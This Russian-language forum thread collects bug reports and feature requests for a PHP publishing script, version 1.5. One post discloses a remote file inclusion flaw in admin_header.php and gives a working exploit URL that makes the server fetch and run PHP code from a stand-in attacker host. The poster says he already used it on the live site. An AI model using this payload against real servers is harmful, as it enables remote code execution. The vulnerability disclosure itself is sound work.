Автор Тема: v 1.5 Final. Обсуждение багов и предложений  (Прочитано 39385 раз)

0 Пользователей и 1 Гость просматривают эту тему.

Оффлайн Dagger

  • Заглянувший
  • Новичок
  • *
  • Сообщений: 19
  • +0/-0
  • 0
    • Просмотр профиля
    • http://allforum.net.ru
v 1.5 Final. Обсуждение багов и предложений
« Ответ #15 : 31 Июля 2004, 12:03:49 »
Хочу отметить такой баг: теймплейт comments_form нельзя изменить.
It\'s Only Hell Around Us...

Оффлайн manicon

  • Заглянувший
  • Новичок
  • *
  • Сообщений: 1
  • +0/-0
  • 0
    • Просмотр профиля
    • http://www.kostja-bazanov.de
v 1.5 Final. Обсуждение багов и предложений
« Ответ #16 : 10 Августа 2004, 22:18:56 »
Bylo by neploxo esli mozhno budet menjat k kakomu razdelu prenadlezhit statja...

o4enj polezno

Оффлайн petrenko.com.ua

  • Завсегдатай
  • Пользователь
  • **
  • Сообщений: 52
  • +0/-0
  • 0
    • Просмотр профиля
    • http://petrenko.com.ua
v 1.5 Final. Обсуждение багов и предложений
« Ответ #17 : 13 Августа 2004, 18:23:42 »
Это предложение по улучшению?

ROFL

  • Гость
v 1.5 Final. Обсуждение багов и предложений
« Ответ #18 : 13 Августа 2004, 21:43:52 »
Здравствуйте.
При инсталяции необходимо что-бы в PHP.ini  были отключены
register_global=off

Иначе возникает серьезная брешь в безопасности.
так, например, появляется  возможность выполнить произвольный PHP code переписав пути к заголовочным файлам

Example:

In file admin_header.php

--------------------cut----------------------

$starttime = $mtime1[1] + $mtime1[0];
require $abspath."/functions.php";
require $abspath."/db/$database.php";
$version = "1.5 RC2";

------------------cut--------------------------

просто делаем запрос типа

http://mp.webscript.ru/admin_header.php?abspath=http://haker.site/
и при исполнение скрипта будет сделана попытка подключить
файл http://haker.site/functions.php, что приведет к исполнению чужого PHP кода.

admin_header.php - это не единственный файл с подобными путями, есть и др. ну это уже не моя забота.

Как доказательство я оставил свой комментарий на главной страничке :)

С уважением @ROFL

Оффлайн Dagger

  • Заглянувший
  • Новичок
  • *
  • Сообщений: 19
  • +0/-0
  • 0
    • Просмотр профиля
    • http://allforum.net.ru
v 1.5 Final. Обсуждение багов и предложений
« Ответ #19 : 14 Августа 2004, 19:38:04 »
Если говорить в целом о предложениях и багах, то скрипт очень нестабилен. Постоянно что-то накрывается и приходится вылавливать баги. Я уже вырезал таблицу counter2 и все обращения к ней из-за какой-то ошибки мешающей нормальной работе. А задумка замечательная - то что нужно.
It\'s Only Hell Around Us...

Оффлайн thebogdan

  • Заглянувший
  • Новичок
  • *
  • Сообщений: 2
  • +0/-0
  • 0
    • Просмотр профиля
    • http://www.cityofgod.org
v 1.5 Final. Обсуждение багов и предложений
« Ответ #20 : 12 Ноября 2004, 04:31:02 »
А я бы еще предложил сделать раздел для авторов: чтобы не просто ник и емейл вводили, а немного про себя, полное имя, сайт, и т.д. Еще чтобы при клике на имя автора в списках произведений выдавалась его страничка с произведениями (а не посылалось мыло!). Чтобы он эту страничку мог сделать у себя стартовой, если бы захотел, поэтому адрес ее должен быть типа http://www.site.com/mp/author.php?user. У меня этот вопрос сейчас поднялся, люди публикуются, но этот процесс для них не слишком удобен, нужно развивать эту идею. Если я чего накручу с кодом, -- притащу сюда. Если у кого это уже есть, поделитесь! :)

Богдан / http://www.cityofGod.org

Оффлайн Peretz91

  • Заглянувший
  • Новичок
  • *
  • Сообщений: 2
  • +0/-0
  • 0
    • Просмотр профиля
    • http://
v 1.5 Final. Обсуждение багов и предложений
« Ответ #21 : 28 Июня 2005, 23:08:22 »
кинтье ссылку, откуда можно скачать этот движокк

please!!!

Гость1

  • Гость
v 1.5 Final. Обсуждение багов и предложений
« Ответ #22 : 12 Октября 2005, 17:52:28 »
ну кто-ж аллов урл фопен открытыми учил оставлять :) :(((

Оффлайн roman_23

  • Заглянувший
  • Новичок
  • *
  • Сообщений: 2
  • +0/-0
  • 0
    • Просмотр профиля
    • http://
v 1.5 Final. Обсуждение багов и предложений
« Ответ #23 : 27 Января 2006, 15:11:48 »
Народ, дайте кто нить сцылку скачаить сие скрипт, или н амыло кинте, а то пишу пишу все как буд то не видят :-(

 

Sitemap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28